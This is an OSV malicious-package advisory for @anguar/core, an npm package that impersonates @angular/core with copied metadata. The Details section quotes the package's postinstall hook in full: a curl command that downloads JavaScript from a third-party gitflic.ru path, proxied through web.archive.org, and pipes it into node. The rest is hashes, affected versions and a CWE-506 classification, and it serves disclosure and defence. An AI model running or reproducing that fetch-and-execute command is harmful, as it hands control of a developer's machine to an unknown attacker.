MAL-2026-17535

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anguar/core/MAL-2026-17535.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17535
Published
2026-10-05T03:32:55Z
Modified
2026-10-05T04:15:06Z
Summary
Malicious code in @anguar/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb)

Package @anguar/core impersonates @angular/core: scope name differs by one letter and package.json name, description, author, and repository metadata are copied from the real @angular/core. The package.json declares a postinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from a gitflic.ru path under the user hellscripter (proxied through web.archive.org) and piping it into Node. The remote source is unpinned, unverified, hosted on infrastructure unrelated to the Angular project, and under full control of a third party. Any developer who mistypes the Angular scope and runs npm install will execute arbitrary attacker-controlled code on their machine.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020997",
            "import_time":  "2026-10-05T03:57:37.60841487Z",
            "modified_time":  "2026-10-05T03:32:55Z",
            "sha256":  "428f991afc1ada001d59a546b8290c039dc16c98f6e497346acd87b8c08034eb",
            "source":  "amazon-inspector",
            "versions":  [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @anguar/core

Package

Name
@anguar/core
View open source insights on deps.dev
Purl
pkg:npm/%40anguar/core

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "c0f7136db131c2a25bcaabc6362c35f1c8059ebb2991dab8d6437ce85d6b2bc9",
            "tlsh":  "fd513624e4f48d6323de6294dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "core-22.2.1.tgz",
            "hashes":  {
                "sha1":  "7bf1a0f340f5ecd96d4558e0254168987a6cf094",
                "sha512_sri":  "sha512-jNO4ZmAtElQjQjT+jhHnxb31XqC/imxCId4L/Ki4UFwdrUyOQyEU8uFv9l0Unn9EIfz7GfDUtQqMji84khH8Dw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anguar/core/MAL-2026-17535.json"